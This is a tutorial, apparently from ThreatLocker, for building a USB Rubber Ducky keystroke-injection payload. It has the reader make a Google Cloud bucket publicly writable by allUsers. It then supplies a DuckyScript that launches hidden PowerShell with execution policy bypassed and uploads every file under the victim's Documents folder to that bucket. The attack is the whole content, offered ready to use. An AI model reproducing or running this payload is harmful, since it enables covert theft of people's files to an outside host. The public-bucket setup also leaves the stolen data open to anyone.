1 Log in to your Google Cloud console to create a google cloud bucket

• Select Cloud Storage
• Buckets

2 Once in the Buckets section:

• Select Create
• Name your Bucket [Name Must be unique]
• accept the default settings
• Select Create

Make sure to uncheck Enforce public access prevention on this bucket as this bucket need to be public facing for the ingress of data to work

Once the bucket has been created you will be presented a screen similar to this one

For this example, we are going to allow for everyone to write (upload files) to the bucket

Select the Permissions tab.

• Select Grant Access
• As New principals type in allUsers
• Assign the role Storage Object Viewer
• Assign the role Storage Object Creator
• Select Save
• Select Allow Public Access

Open a browser and visit Hak5 PayloadStudio

• Select Community Edition

Copy and paste the following code into the Encoder:

REM Data exfiltration to google bucket ThreatLocker

GUI r

DELAY 1000

STRING cmd.exe

ENTER

DELAY 1000

STRING powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& { Function UploadFile {Param ([string]$path) Process {$Uri = 'https://www.googleapis.com/upload/storage/v1/b/YOUR_BUCKET_NAME_HERE/o?uploadType=media&name='+$path;Invoke-RestMethod -Method Post -Uri $Uri -Header $header - ContentType 'text/plain' -InFile $path;}};Get-ChildItem -Path $HOME\Documents -Recurse | ForEach-Object { try { UploadFile -path $_.FullName -fileName $_.Name -dir $_.DirectoryName}catch{} }; }"

DELAY 1000

ENTER

DELAY 1000

STRING exit

ENTER

Search for the string YOUR_BUCKET_NAME in the ducky script and replace it with your Google Buckets Unique name.

Once the change has been made

• Select Generate Payload
• Select Download

Once Downloaded put your ducky into storage mode by clicking The Button

• Drag and drop your new inject.bin into the ducky's root directory

Congratulations, You are done!

• Eject the Ducky an d plug it back into your computer
• The Script will run and upload data over to you public Google Bucket